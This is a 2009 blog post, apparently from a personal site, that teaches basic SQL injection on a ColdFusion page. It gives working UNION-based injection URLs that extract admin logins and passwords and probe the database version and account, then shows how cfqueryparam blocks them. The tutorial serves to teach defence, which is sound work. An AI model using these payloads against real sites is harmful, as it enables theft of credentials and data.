admin | 
04 13th, 2009| 
Finally got my Acumen installed on my 929 and I’m liking the look 
Haven’t gotten the chance to configure it yet tho
Apr
12
The most commonly used entry method for web applications today is through SQL injection. Anyone with just a little knowledge of SQL syntax can obtain vital information from a business or inject malicious code to be rendered when anonymous users visit a page. The purpose of the following article is to educate developers and administrators of the security vulnerabilities that may exist in their publicly accessible web sites.
Example:
http://jw0rd.com/test2.cfm?id=1
A basic database driven ColdFusion page that uses the URL parameter ‘id’ in a SQL SELECT statement. This is what the output of the page is supposed to look like:
The coding on this page selects a record from the ‘articles’ table where id = #URL.id#
select * from articles where id = #URL.id#
It then outputs the title, category, and article fields for that row where id = #URL.id#. Like a lot of poorly coded web applications there is no sanitation on the URL parameter ‘id’, so lets alter the SQL statement and add a UNION.
URL encoding – http://www.w3schools.com/TAGS/ref_urlencode.asp
%20 = [space]
%27 = ‘
http://jw0rd.com/test2.cfm?id=1%20union%20select%201,%27%27,login,password%20from%20admin
The full SQL statement is now:
select * from articles union select 1,'',login,password from admin
The output on the page is now two records, one from the articles table and one from the admin table.
Now let’s add a select on @@version to determine the version of SQL the database server is running and also SYSTEM_USER to see if its possibly using a high privileged SQL account such as ’sa’.
http://jw0rd.com/test2.cfm?id=1%20union%20select%201,@@version,SYSTEM_USER,%27%27%20from%20admin%20order%20by%20title
The full SQL statement is now:
select * from articles union select 1,@@version,SYSTEM_USER,'' from admin order by title
Now that you get the idea of how to exploit through SQL injection how do you prevent it? ALL variables that can be POST’d or GET’d from an anonymous user need to be sanitized. For our ColdFusion example above the use of the ‘cfqueryparam’ tag will get the job done -> http://livedocs.adobe.com/coldfusion/8/htmldocs/help.html?content=Tags_p-q_18.html
Original, vulnerable SQL Statement in test2.cfm:
select * from articles where id = #URL.id#
Updated, secure SQL statement:
select * from articles where id = <cfqueryparam value="#URL.id#" CFSQLType = "CF_SQL_INTEGER">
Now that we are forcing that variable to be of type integer lets try to inject a SQL statement again.
SQL injection is no longer possible through the ‘id’ parameter:
Invalid data 1 union select 1,”,login,password from admin for CFSQLTYPE CF_SQL_INTEGER.
Another security risk is the raw ColdFusion error that displays a snippet of our code to an anonymous user. Setting up custom error handling so that is not seen is always a good idea but is an entirely different subject.
Hopefully I will have some extra time soon to post a similar article related to basic MySQL injection techniques.